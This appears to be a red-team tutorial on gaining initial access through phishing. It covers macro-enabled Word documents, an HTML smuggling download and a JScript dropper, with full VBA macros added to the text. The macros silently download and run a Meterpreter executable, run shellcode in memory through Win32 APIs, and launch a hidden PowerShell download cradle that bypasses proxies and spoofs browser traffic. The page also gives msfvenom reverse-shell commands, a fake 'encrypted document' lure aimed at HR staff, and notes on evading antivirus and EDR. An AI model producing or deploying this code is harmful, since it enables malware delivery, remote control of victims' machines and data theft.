- This technique downloads a Meterpreter payload as soon as the user loads the web page (it may be blocked by SmartScreen or other browser protections).
Code can be found here
- This technique runs a macro (once the user enables macros) that downloads a Meterpreter payload to disk and executes it hidden from the user.
- Tested with Office 2016 Pro.
- The document must be saved in a macro-enabled format such as ".doc" or ".docm"; the newer ".docx" format will not store macros.
Code can be found here
- Make a PowerShell script that downloads the payload. Here is how to download a file in PowerShell.
- Combine the pieces with VBA: make a macro that pulls the Meterpreter executable from our web server when the document is opened and macros are enabled. The delay gives the file time to download completely. Finally, the file is executed hidden from the user.
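The two steps above combined into one macro, as an added example that is not the page's own code. It spawns a hidden PowerShell child to fetch the executable, waits until the file has been fully written (download to a temporary name, then rename) instead of trusting a fixed delay, and finally runs it hidden. The URL, the file name and the 30-second limit are assumptions.

```vba
' Added example, not the page's own code. AutoOpen downloads an executable with a
' hidden PowerShell child, waits for the download to finish, then runs it hidden.
' PAYLOAD_URL, the file name and MAX_WAIT_SECONDS are assumptions.
Option Explicit

#If VBA7 Then
    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else
    Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If

Private Const PAYLOAD_URL As String = "http://192.168.1.22/update.exe"
Private Const MAX_WAIT_SECONDS As Long = 30

' Word runs AutoOpen from a standard module when the document is opened
' and macros are enabled.
Sub AutoOpen()
    DownloadAndRun
End Sub

Private Sub DownloadAndRun()
    Dim dest As String, part As String, cmd As String, waited As Long
    dest = Environ$("TEMP") & "\update.exe"
    part = dest & ".part"

    ' Download to a temporary name and rename only when complete, so the
    ' existence of `dest` means the file is whole. WebClient writes the file
    ' while it downloads, so checking `dest` directly would race the download.
    cmd = "powershell.exe -NoProfile -WindowStyle Hidden -Command " & _
          """(New-Object Net.WebClient).DownloadFile('" & PAYLOAD_URL & "','" & part & "');" & _
          "Move-Item -Force '" & part & "' '" & dest & "'"""
    Shell cmd, vbHide   ' vbHide: no console window is shown to the user

    ' Poll for the final file instead of sleeping a fixed time.
    Do While Dir$(dest) = "" And waited < MAX_WAIT_SECONDS
        Sleep 1000
        DoEvents
        waited = waited + 1
    Loop

    ' Quote the path: %TEMP% often contains spaces (C:\Users\John Doe\...).
    If Dir$(dest) <> "" Then
        Shell """" & dest & """", vbHide   ' run the payload with no visible window
    End If
End Sub
```

Note that the payload is written to disk and started as a child of WINWORD.EXE, which is exactly what SmartScreen, EDR parent-child rules and a ".exe dropped to %TEMP% by Office" detection look for; the in-memory variants further down exist to avoid those artifacts.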
- This technique tricks the user into clicking the "Enable Editing" and "Enable Content" buttons, which allows macro execution.
Code can be found here
- Create an "encrypted" page of content, along the lines of "This file is encrypted, please Enable Editing and Enable Content to decrypt it".
- Make a copy of this Word document.
- Delete the content and create your "decrypted" content. If your target works in human resources, a CV is a good example.
- Once the content is created, select it and navigate to "Insert > Quick Parts > AutoText > Save Selection to AutoText Gallery".
- Pick a name for the AutoText entry. Make sure the entry is saved into the file you are sending (the "Save in" drop-down), not into Normal.dotm; an entry saved in Normal.dotm stays on your machine and the victim's Word has nothing to insert.
- Now that the content is stored, delete the content in the main text area and replace it with the content of our "encrypted" document.
- Create the VBA macro that replaces the "encrypted" content with the "decrypted" AutoText entry.
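The macro for the last step, as an added example that is not the page's own code. When macros are enabled it overwrites the "encrypted" lure with the saved AutoText entry. The entry name "Decrypted" is an assumption; use whatever name you chose in the gallery.

```vba
' Added example, not the page's own code. On open, replace the "encrypted"
' lure with the AutoText entry saved in the steps above.
' ENTRY_NAME is an assumption; use the name you chose when saving the entry.
Option Explicit

Private Const ENTRY_NAME As String = "Decrypted"

Sub AutoOpen()
    ShowDecryptedContent ENTRY_NAME
End Sub

Private Sub ShowDecryptedContent(ByVal entryName As String)
    Dim entry As AutoTextEntry

    ' Building blocks are stored in a template; for an entry saved into the
    ' file itself, AttachedTemplate is the file's own store, so it travels
    ' with the document instead of staying in the attacker's Normal.dotm.
    On Error Resume Next
    Set entry = ActiveDocument.AttachedTemplate.AutoTextEntries(entryName)
    On Error GoTo 0

    ' Entry missing (wrong name, or saved in the wrong template): leave the
    ' lure untouched rather than popping an error box at the user.
    If entry Is Nothing Then Exit Sub

    ' Replace the whole body; RichText:=True keeps the saved formatting.
    entry.Insert Where:=ActiveDocument.Content, RichText:=True

    ' Avoid a "save changes?" prompt when the user closes the document.
    ActiveDocument.Saved = True
End Sub
```

Test the name lookup on a machine other than the one the document was built on: if the entry was saved into Normal.dotm the macro silently does nothing there, which is the failure mode the `Is Nothing` check covers.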
- This macro executes shellcode in memory using Win32 APIs, so no payload file is written to disk for antivirus to scan.
- Use the exit function "thread" when generating the payload (EXITFUNC=thread) so that Word does not close when the shellcode exits.
- The shellcode runs inside the Word process: if the victim closes Word, our shell dies.
Code can be found here
- Generate an msf payload in vbapplication format.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.22 LPORT=443 EXITFUNC=thread -f vbapplication
- Create the macro, adding your generated payload array to it.
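The runner the steps above describe, as an added example that is not the page's own code: VirtualAlloc an RWX page inside WINWORD.EXE, copy the bytes in with RtlMoveMemory, and start them on a new thread with CreateThread. The byte array is a stand-in (a single RET instruction, 0xC3) so the macro is harmless as written; replace it with the `buf = Array(...)` line that the msfvenom command above prints. The 32/64-bit declarations are needed because Office 2016 ships in both flavours.

```vba
' Added example, not the page's own code. Classic in-memory shellcode runner:
' VirtualAlloc (RWX) -> RtlMoveMemory -> CreateThread, all inside the Word process.
' The Array(&HC3) below is a harmless stand-in (x86/x64 RET); paste the
' `buf = Array(...)` produced by msfvenom -f vbapplication in its place.
Option Explicit

#If VBA7 Then
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (ByVal Destination As LongPtr, ByRef Source As Any, ByVal Length As LongPtr)
    Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal lpThreadAttributes As LongPtr, ByVal dwStackSize As LongPtr, ByVal lpStartAddress As LongPtr, ByVal lpParameter As LongPtr, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As LongPtr
#Else
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Sub RtlMoveMemory Lib "kernel32" (ByVal Destination As Long, ByRef Source As Any, ByVal Length As Long)
    Private Declare Function CreateThread Lib "kernel32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long
#End If

Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40

Sub AutoOpen()
    Dim buf As Variant
    ' Stand-in payload: a single RET, so the thread returns immediately.
    buf = Array(&HC3)
    RunShellcode buf
End Sub

Private Sub RunShellcode(ByRef buf As Variant)
    Dim bytes() As Byte, i As Long, size As Long
#If VBA7 Then
    Dim addr As LongPtr
#Else
    Dim addr As Long
#End If
    Dim tid As Long

    ' Copy the Variant array into a real byte buffer for RtlMoveMemory.
    size = UBound(buf) - LBound(buf) + 1
    ReDim bytes(0 To size - 1)
    For i = 0 To size - 1
        bytes(i) = buf(LBound(buf) + i)
    Next i

    ' RWX allocation: the single most-watched API sequence for macro runners.
    addr = VirtualAlloc(0, size, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    If addr = 0 Then Exit Sub

    RtlMoveMemory addr, bytes(0), size

    ' New thread so AutoOpen returns and Word stays responsive. With
    ' EXITFUNC=thread the payload ends with ExitThread, not ExitProcess,
    ' which is why Word survives when the shellcode exits.
    CreateThread 0, 0, addr, 0, 0, tid
End Sub
```

Everything lives in WINWORD.EXE's address space, so the trade-off the page states holds: nothing touches disk, but the session dies with the Word process.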
- This macro downloads a PowerShell script and runs it in memory. The script is launched in a separate PowerShell child process, so the shell is not lost when the victim closes Microsoft Word.
Code can be found here
- Generate the shellcode in PowerShell format using msfvenom.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.22 LPORT=443 EXITFUNC=thread -f ps1
- Create the "run.ps1" script.
- Create the VBA macro that downloads the ps1 code into memory and executes it.
- This PowerShell script avoids creating artifacts on disk that antivirus could flag.
Code can be found here
- The generation steps are the same as for the previous technique: generate the shellcode in ps1 format with msfvenom, create the "run.ps1" script, and create the VBA macro that downloads the ps1 code into memory and executes it.
Code can be found here
- Bypass the proxy when downloading a file with PowerShell by nulling the WebClient's proxy settings (useful when direct egress is allowed but the system proxy would block or log the request).
- Customize the User-Agent so the request blends in with normal browser traffic.
- Handle communication through a proxy, even as SYSTEM (which has no per-user proxy settings to inherit), by setting the proxy explicitly.
- The HTTP request is then routed through the proxy server, so our download cradle can still call back to our C2 when all traffic must go through the proxy.
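One macro covering both the child-process cradle technique (download the ps1 and run it in memory from a separate PowerShell process) and the proxy points just above, as an added example that is not the page's own code. Two cradle variants are built as strings: one that nulls the proxy and one that routes through an explicit proxy with the current credentials, both with a custom User-Agent. The script URL, the proxy address and the User-Agent string are assumptions.

```vba
' Added example, not the page's own code. AutoOpen launches powershell.exe as a
' child process running a download cradle entirely in memory (IEX of the
' downloaded text), so the shell survives the user closing Word.
' SCRIPT_URL, PROXY_URL and USER_AGENT are assumptions.
Option Explicit

Private Const SCRIPT_URL As String = "http://192.168.1.22/run.ps1"
Private Const PROXY_URL As String = "http://proxy.corp.local:8080"
Private Const USER_AGENT As String = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"

' Variant 1: direct egress works; null the proxy so WebClient ignores the
' per-user (IE/WinINet) proxy settings, and set a browser-like User-Agent.
Private Function CradleNoProxy() As String
    CradleNoProxy = "$w=New-Object Net.WebClient;" & _
        "$w.Proxy=$null;" & _
        "$w.Headers.Add('User-Agent','" & USER_AGENT & "');" & _
        "IEX $w.DownloadString('" & SCRIPT_URL & "')"
End Function

' Variant 2: all traffic must go through the corporate proxy. Setting the
' proxy explicitly also works when running as SYSTEM, which has no per-user
' proxy settings to inherit; DefaultCredentials is then the machine account.
Private Function CradleViaProxy() As String
    CradleViaProxy = "$w=New-Object Net.WebClient;" & _
        "$p=New-Object Net.WebProxy('" & PROXY_URL & "',$true);" & _
        "$p.Credentials=[Net.CredentialCache]::DefaultCredentials;" & _
        "$w.Proxy=$p;" & _
        "$w.Headers.Add('User-Agent','" & USER_AGENT & "');" & _
        "IEX $w.DownloadString('" & SCRIPT_URL & "')"
End Function

Sub AutoOpen()
    Dim cmd As String
    ' Pick the variant matching the target's egress; the proxy one is used here.
    cmd = "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden " & _
          "-ExecutionPolicy Bypass -Command """ & CradleViaProxy() & """"
    ' Shell returns as soon as the child starts; the child is not tied to
    ' WINWORD.EXE's lifetime, so closing Word does not kill the session.
    Shell cmd, vbHide
End Sub
```

The cradle strings contain only single quotes, so they can be wrapped in the double quotes that `-Command` expects without further escaping. Be aware that `powershell.exe` spawned by WINWORD.EXE with `-WindowStyle Hidden -ExecutionPolicy Bypass` is a parent-child pair most EDRs alert on, whatever the proxy settings.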
- Use the JScript file format (.js) to execute JavaScript on Windows targets through the Windows Script Host (wscript.exe / cscript.exe).
- This dropper downloads a Meterpreter executable from a web server and executes it.
Code can be found here